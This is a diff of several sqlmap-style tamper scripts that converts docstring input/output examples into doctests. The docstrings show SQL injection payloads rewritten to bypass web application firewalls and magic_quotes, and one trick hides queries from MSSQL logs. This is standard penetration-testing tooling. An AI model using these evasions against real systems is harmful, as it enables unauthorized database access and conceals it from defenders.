|  |     "1 AND 1=1 and '0having'='0having'" | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload + " and '0having'='0having'" if payload else payload |     return payload + " and '0having'='0having'" if payload else payload | ||||||
|  |  | ||||||
|  | @ -13,16 +13,15 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |     Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227-- |  | ||||||
|         * Output: 1 AND 9227=9227--sp_password |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure |         * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure | ||||||
|         * Reference: http://websec.ca/kb/sql_injection |         * Reference: http://websec.ca/kb/sql_injection | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227-- ') | ||||||
|  |     '1 AND 9227=9227-- sp_password' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces space character (' ') with comments '/**/' |     Replaces space character (' ') with comments '/**/' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT/**/id/**/FROM/**/users |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -28,6 +24,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass weak and bespoke web application firewalls |         * Useful to bypass weak and bespoke web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT/**/id/**/FROM/**/users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -17,20 +17,18 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a dash comment ('--') followed by |     Replaces space character (' ') with a dash comment ('--') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
|         * SQLite |         * SQLite | ||||||
| 
 | 
 | ||||||
|     Tested against: |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ZeroNights SQL injection challenge, |         * Used during the ZeroNights SQL injection challenge, | ||||||
|           https://proton.onsec.ru/contest/ |           https://proton.onsec.ru/contest/ | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -37,6 +33,10 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -26,10 +26,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL >= 5.1.13 |         * MySQL >= 5.1.13 | ||||||
| 
 | 
 | ||||||
|  | @ -40,6 +36,10 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT%08id%02FROM%0Fusers |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Microsoft SQL Server |         * Microsoft SQL Server | ||||||
| 
 | 
 | ||||||
|  | @ -35,6 +31,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%0Eid%0DFROM%07users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -14,16 +14,15 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a pound character ('#') followed by |     Replaces space character (' ') with a pound character ('#') followed by | ||||||
|     a new line ('\n') |     a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1%23%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1%23%0AAND%23%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT%0Bid%0BFROM%A0users |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -34,6 +30,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%A0id%0BFROM%0Cusers' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a dash comment ('--') followed by |     Replaces space character (' ') with a dash comment ('--') followed by | ||||||
|     a new line ('\n') |     a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1--%0AAND--%0A9227=9227 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
|         * MSSQL |         * MSSQL | ||||||
|  | @ -33,6 +29,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls. |         * Useful to bypass several web application firewalls. | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227') | ||||||
|  |     '1--%0AAND--%0A9227=9227' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -16,14 +16,13 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces space character (' ') with plus ('+') |     Replaces space character (' ') with plus ('+') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT+id+FROM+users |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Is this any useful? The plus get's url-encoded by sqlmap engine |         * Is this any useful? The plus get's url-encoded by sqlmap engine | ||||||
|           invalidating the query afterwards |           invalidating the query afterwards | ||||||
|         * This tamper script works against all databases |         * This tamper script works against all databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT+id+FROM+users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a random blank character from a |     Replaces space character (' ') with a random blank character from a | ||||||
|     valid set of alternate characters |     valid set of alternate characters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT\rid\tFROM\nusers |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -31,6 +27,10 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls |         * Useful to bypass several web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT%0Did%0DFROM%0Ausers' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     # ASCII table: |     # ASCII table: | ||||||
|  |  | ||||||
|  | @ -16,9 +16,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces UNION ALL SELECT with UNION SELECT |     Replaces UNION ALL SELECT with UNION SELECT | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper('-1 UNION ALL SELECT') | ||||||
|         * Input: -1 UNION ALL SELECT |     '-1 UNION SELECT' | ||||||
|         * Output: -1 UNION SELECT |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload |     return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload | ||||||
|  |  | ||||||
|  | @ -19,15 +19,14 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces quote character (') with a multi-byte combo %bf%27 together with |     Replaces quote character (') with a multi-byte combo %bf%27 together with | ||||||
|     generic comment at the end (to make it work) |     generic comment at the end (to make it work) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1' AND 1=1 |  | ||||||
|         * Output: 1%bf%27 AND 1=1--%20 |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful for bypassing magic_quotes/addslashes feature |         * Useful for bypassing magic_quotes/addslashes feature | ||||||
| 
 | 
 | ||||||
|     Reference: |     Reference: | ||||||
|         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string |         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string | ||||||
|  | 
 | ||||||
|  |     >>> tamper("1' AND 1=1") | ||||||
|  |     '1%bf%27 AND 1=1-- ' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -22,10 +22,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Encloses each non-function keyword with versioned MySQL comment |     Encloses each non-function keyword with versioned MySQL comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# |  | ||||||
|         * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -35,6 +31,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls when the |         * Useful to bypass several web application firewalls when the | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') | ||||||
|  |     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Encloses each keyword with versioned MySQL comment |     Encloses each keyword with versioned MySQL comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# |  | ||||||
|         * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL >= 5.1.13 |         * MySQL >= 5.1.13 | ||||||
| 
 | 
 | ||||||
|  | @ -36,6 +32,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass several web application firewalls when the |         * Useful to bypass several web application firewalls when the | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') | ||||||
|  |     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||